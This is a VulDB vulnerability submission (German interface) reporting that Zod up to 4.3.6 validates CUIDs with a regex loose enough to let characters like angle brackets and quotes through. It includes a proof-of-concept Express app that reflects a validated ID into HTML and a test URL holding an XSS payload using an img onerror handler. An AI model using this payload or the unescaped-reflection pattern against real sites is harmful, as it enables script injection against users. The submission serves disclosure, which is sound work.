Submit #796749: colinhacks Zod <=4.3.6 Improper Input Validationinfo

Titel	colinhacks Zod <=4.3.6 Improper Input Validation
Beschreibung	### Summary Zod provides functionality to validate data input, primarily from users, and thousands of websites rely on its validation. The CUID data type should only allow alphanumeric characters. Even though CUID is now considered obsolete and the standard recommendation is to use CUID2, Zod should still prevent unsafe characters such as `{} ' ; < >`, which can lead to XSS, SQL Injection, or Command Injection. ### Details This is the vulnerable regex line: https://github.com/colinhacks/zod/blob/c7805073fef5b6b8857307c3d4b3597a70613bc2/packages/zod/src/v4/core/regexes.ts#L3 ### PoC XSS exploiting the trust of CUID input. ```javascript const express = require('express'); const { z, ZodError } = require('zod'); const app = express(); const PORT = 3000; const CuidSchema = z.object({ id: z.cuid('The provided ID is not a valid CUID.').min(1, 'The ID parameter is required.'), }); const validateCuid = (req, res, next) => { try { const validatedData = CuidSchema.parse(req.query); req.validatedQuery = validatedData; next(); } catch (error) { if (error instanceof ZodError) { return res.status(400).json({ status: 'error', message: 'Input validation failed.', errors: error.issues.map(issue => ({ path: issue.path.join('.'), message: issue.message })) }); } return res.status(500).json({ status: 'error', message: 'Internal server error.' }); } }; app.get('/item', validateCuid, (req, res) => { const validCuid = req.validatedQuery.id; res.status(200).send(` <!DOCTYPE html> <html lang="en"> <body> <h1>Valid CUID Received</h1> <p>The provided CUID is: <strong>${validCuid}</strong></p> </body> </html> `); }); app.listen(PORT, () => { console.log(`Server running at http://localhost:${PORT}`); console.log(`Test a valid route: http://localhost:${PORT}/item?id=ck0a79p0000002p572b1v2s8v`); console.log(`Test an invalid route: http://localhost:${PORT}/item?id=c%3Cstrong%3E%3Cimg/src=%221%22onerror=alert(1)%3Ek0a79p0000002p572b1v2s8v`); }); ``` <img width="1633" height="241" alt="image" src="https://github.com/user-attachments/assets/f36c40ca-e992-4642-94b8-6810f7fe8eed" /> ### Impact Improper input validation is a critical security flaw that can lead to severe vulnerabilities like Cross-Site Scripting (XSS), SQL Injection (SQLi), and Remote Code Execution (RCE). This makes it extremely critical that input be strictly limited to alphanumeric characters whenever possible. By enforcing this restriction, you prevent malicious characters (like quotes, angle brackets, or semicolons) from being processed by the system's runtime, database, or browser, effectively mitigating these injection risks.
Benutzer	dsonbacker (UID 46970)
Einreichung	03.04.2026 23:54 (vor 24 Tagen)
Moderieren	24.04.2026 21:38 (21 days later)
Status	Akzeptiert
VulDB Eintrag	359543 [colinhacks Zod bis 4.3.6 CUID Data Type regexes.ts SQL Injection]
Punkte	17

◂ Zurück Übersicht Weiter ▸

Do you need the next level of professionalism?

Upgrade your account now!